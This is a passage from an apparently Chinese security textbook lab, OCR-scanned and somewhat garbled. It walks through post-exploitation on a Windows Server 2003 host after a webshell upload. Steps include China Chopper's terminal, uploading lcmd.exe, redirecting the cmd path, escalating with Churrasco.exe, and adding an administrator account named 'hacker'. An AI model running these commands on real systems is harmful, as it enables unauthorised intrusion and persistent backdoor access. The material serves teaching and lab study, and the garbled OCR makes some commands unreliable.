到 服务 器 更 深层 的 机 器 。 在 企业 内 网 ,通常 这 些 网 络 环境 中 都 有 用 户 权 限 控制 ,即使 误 中 木 
马 ,也 不 会 造成 影响 ,更 不 能 传播 ,所 以 还 需 更 进一步 地 获取 系统 权限 。 回 到 中 国 菜刀 主 界 
面 选 择 “ 文 件 管理 ”下面 的 “虚拟 终端 "选项 ,如 图 9-284 和 图 9-285 所 示 。 


EI c jenes + 
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9-284 ”打开 中 国 菜刀 虚拟 终端 


a WI 19.166. 1.32 Qe * 


d "ESTABLISHED 


9-285 ”执行 系统 权限 出 错 


查看 ipconfig 时 发 现 被 拒绝 ,说 明 执 行 权限 较 低 。 

(9) Windows Server 2003 默认 对 cmd 进行 权限 设置 ,导致 无 法 执行 远程 命令 。 但 在 前 
面 已 经 获得 了 文件 上 传 权限 , 回 到 shell 的 文件 管理 界面 , 布 击 空白 处 ,选择 “文件 上 传 ”, 上 
传 新 的 工具 lcmd. exe 至 服务 器 ,如 图 9-286 所 示 。 

(10) 通过 SETP [ShellPat 命令 修改 cmd 路 径 。 回 到 终端 ,输入 “setp C: \Inetpub\ 
wwwroot\PowerEasy\Space\test1111. aspV201602V1emd. exe”, 达 到 绕 过 Windows Server 
2003 系统 权限 的 目的 ,如 图 9-287 所 示 。 
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图 9-286 上 传 lemd. exe 
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netstat ~an | find "ESTABLISHED 


图 9-287 设置 cmd 路 径 


参数 解释 如 下 。 
setp: 是 中 国 菜刀 工具 中 改变 cmd 路 径 的 命令 
OD 设置 终端 路 径 后 通过 ipconfig, whoami 等 命令 查看 发 现 当前 登录 的 账号 权限 还 是 


较 低 , 没 法 添加 用 户 到 管理 组 ,如 图 


9-288 所 示 
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图 9-288 利用 新 的 cmd 执行 系统 命令 
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(12) 对 于 Windows 提 权 ,好 用 的 工具 当 属 Churrasco. exe 了 ,下 面 上 传 Churrasco. exe 
到 目标 服务 器 进行 提 权 ,如 图 9-289 和 图 9-290 所 示 。 
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图 9-289 上 传 Churrasco. exe 
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9-290 上传 Churrasco. exe 成 功 


"命令 并 观察 服务 器 返回 结果 是 否 成 功 ,如 


(13) 尝试 执行 Churrasco. exe "net user" fi 


图 9-291 所 示 。 
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图 9-291 查看 服务 器 账户 信息 


2 和 图 9 所 示 。 


(14) 使 用 提 权 工具 执行 如 下 命令 
输入 : 


Churrasco. exe "net user hacker 123456 /add"; 
Churrasco. exe "net localgroup administrators hacker /add". 
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Thread not 
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图 9-293 ”将 普通 账号 hacker 添加 到 管理 组 


(15) 执行 Churrasco. exe "net user" 命 令 查看 系统 账号 ,可 见 新 增 了 一 个 名 为 hacker 


的 账号 ,如 图 9-294 所 示 。 
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图 9-294 ”查看 账号 信息 
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(16) 执行 Churrasco. exe "net user hacker"f 


功 添加 到 了 管理 员 组 ,如 图 9-295 所 示 。 


9-295 ”查看 hacker 账户 信息 


总 结 : 通过 本 实验 了 解 了 如 何 通过 IIS 解析 漏洞 上 传 木马 文件 ,以 及 获取 webshell 后 


如 何 进一步 提 权 。 
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